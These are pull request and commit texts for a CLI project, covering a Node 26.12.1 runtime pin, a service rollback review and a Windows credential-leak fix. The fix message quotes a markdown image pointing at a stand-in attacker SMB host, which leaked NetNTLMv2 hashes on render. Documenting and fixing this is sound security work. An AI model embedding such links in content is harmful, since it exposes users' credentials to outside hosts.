Problem

Standalone CLI releases still embed Node 26.8.2, predating the October security fixes in Node 26.12.1. Updating host Node does not change an executable's embedded runtime.

Change

Pin the root package.json engine to exact Node 26.12.1 and use it as the single source for development, CI and native/cross-target executable builds. Existing CI setup already reads this field. Remove the separate release override and executable runtime constant. Reject native builds under a different Node, and update build help and release guidance.

This also moves the repository's development/CI baseline from Node 24 to Node 26, following Julius's suggestion. The five-file packaging change is independent of #23173, which contains service lifecycle, diagnostics and expanded archive smoke coverage. Both target main.

Verification

  • vp run check:changed passed format, lint, knip, generated GraphQL checks and affected-package typechecks.
  • Rebuilt the macOS arm64 executable/archive using the root engine pin and passed the existing archive smoke with isolated startup/HTTP. An isolated preload probe reported embedded Node 26.12.1. A native build under Node 26.12.0 was rejected as intended.
  • build-exe --help reports the pinned native version and separate cross-target host minimum. CI passed the split head before this follow-up.

Other archive targets, Windows/WSL packaging and production signing/notarization remain with CI/release verification; the local archive is signed ad hoc. A published release needs a new T3 version because installations are cached by application version. Existing launchers still need the host-side refresh described in #23173. Electron's embedded runtime is separate.

🟠 High cloud/bootService.ts:947

If manager.activate starts the replacement service and then its command fails, this finalizer restores the previous activeVersion and restarts the old runtime even though the replacement may already have migrated the database. Because activated is set only after runSteps(manager.activate) succeeds, do not roll back the selected runtime once activation has been attempted unless the database is also safely restored.

Confirmed. The service changes are now in #23173, while this PR is limited to the Node build pin and guard. #23173 separates preparation from the command that can start the service: once systemctl restart or launchctl bootstrap is attempted, failure/interruption preserves the replacement selection and database state. Four new Linux/macOS regressions simulate migration before a failed/interrupted start; they fail on the earlier implementation and pass with the fix. Pre-start failures still restore the prior definition, state and marker.

Approvability

Verdict: Needs Human Approval

Macroscope's review found this PR requires human approval — This small build/release change moves the development and standalone CLI runtime baseline from Node 24/26.8.2 to exact Node 26.12.1, affecting every newly packaged executable and enforcing the host version for native builds. Because it changes a product runtime default and is security-motivated, it warrants human review.

📝 Walkthrough

The CLI executable build now uses Node 26.12.1. Packaging configuration, the desktop release workflow, and release documentation use the same version.

scripts/lib/cli-runtime.ts, apps/server/vite.config.ts, .github/workflows/release-desktop.yml, docs/operations/release.md
The shared CLI runtime version is set to 26.12.1. Executable packaging validates the running Node version when no target is specified and uses the shared version for generated targets. The desktop release workflow and documentation specify 26.12.1.

Upstream pingdotgg#23165 removed SEA_NODE_VERSION from apps/server/vite.config.ts and pinned native CLI executables to the root package.json engines.node version, so every fork host build stopped at 'Cannot read SEA_NODE_VERSION'. The host archive build now passes engines.node to vp pack, which also satisfies upstream's new exact-version check.

Upstream pingdotgg/t3code pingdotgg#23165 pins engines.node to 26.12.1, removes SEA_NODE_VERSION and stops native executable builds on any other Node. The fork release no longer forces Node 26.8.2, and the local deploy script reads engines.node.

* Merge commit from fork

A markdown image such as ![x](file://attacker.test/share/cat.jpg), or a raw
\\host\share path, was classified as a host file. Rendering it asked the
server for a signed asset URL, and the server's realpath on the resulting UNC
path made Windows open an SMB session and send the user's NetNTLMv2 response
to the attacker's host, with no click and no tool call. File-link chips did
the same through filesystem.getMetadata, which stats every absolute path, and
storage cleanup stats the store paths in a worktree's pnpm manifest, which an
agent can write.

Network paths (two leading separators, as Windows reads them: \\h, //h, /\h)
now only resolve inside the thread's project, so projects on a share keep
working:

- clients block them in markdown images and stop treating them as file links
- the web stops asking for their metadata
- the server refuses them for media assets and file reads outside the
project, never stats one for metadata, and storage cleanup ignores a pnpm
  manifest that names one
- each check hands the filesystem the resolved path it approved, since
Windows reads a `\\?\` path as written, `..` included
